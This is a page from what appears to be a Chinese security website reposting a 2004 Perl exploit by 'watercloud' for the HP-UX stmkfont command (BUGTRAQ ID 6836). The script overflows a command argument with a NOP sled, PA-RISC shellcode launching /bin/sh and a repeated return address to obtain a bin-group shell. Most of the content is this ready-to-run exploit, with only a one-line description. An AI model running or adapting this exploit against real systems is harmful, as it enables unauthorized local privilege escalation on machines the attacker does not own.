首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Exploit stmkfont of HPUX to get bin gid shell
来源:www.xfocus.org 作者:watercloud 发布时间:2004-06-16  

A perl version exploit script for command stmkfont of hp-ux to get bin gid shell.
It's a old bug ,BUGTRAQ ID: 6836.


#!/usr/bin/perl
# Name : x_hpux_stmkfont.pl
# Exploit stmkfont command of HPUX to get bin gid shell.
# * Usage : perl ./x_houx_stmkfont.pl
# By watercloud 2003-2-20
# http://www.xfocus.org
# http://www.xfocus.net
$nop ="\x0b\x39\x02\x99"x65;
$shell ="\x0b\x39\x02\x57\x2a\xe4\x97\x10\x28\x3b\x70\xef\x08\x37\x02\x43";
$shell.="\xb6\xfa\x40\x04\xb6\xf9\x40\x04\xb6\xf8\x40\x04\xe4\x60\xe0\x08";
$shell.="\xb6\xf6\x40\xfe\x0b\x39\x02\x99\x2b\x24\x97\x10\x28\x3b\x70\xef";
$shell.="\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22\x0f\x40\x12\x0e";
$shell.="\x08\x39\x02\x43\xe4\x60\xe0\x08\xb4\x16\x70\x16/bin/shA";
$addr .="\x7f\x7f\x01\x10"x5000;
exec("/usr/bin/stmkfont -d1 x -d2 " . "'${nop}${shell}${addr}'" . " x");
#EOF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux Kernel 2.4.x-2.6.x Local
·TCP Window Size RST
·Exploit xfs command of HPUX to
·ASP版SQLSERVER注射数据表结构猜
·Toca Race Driver 1 multiple Do
·serv-u本地权限提升工具
·Squid STABLE NTLM authenticate
·c/s型asp木马
·Subversion svn_time_from_cstri
·Ircd-Hybrid-7/Ircd-Ratbox Low-
·Borland Interbase 7.x and belo
·Remote D.O.S WinAgents TFTP Se
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved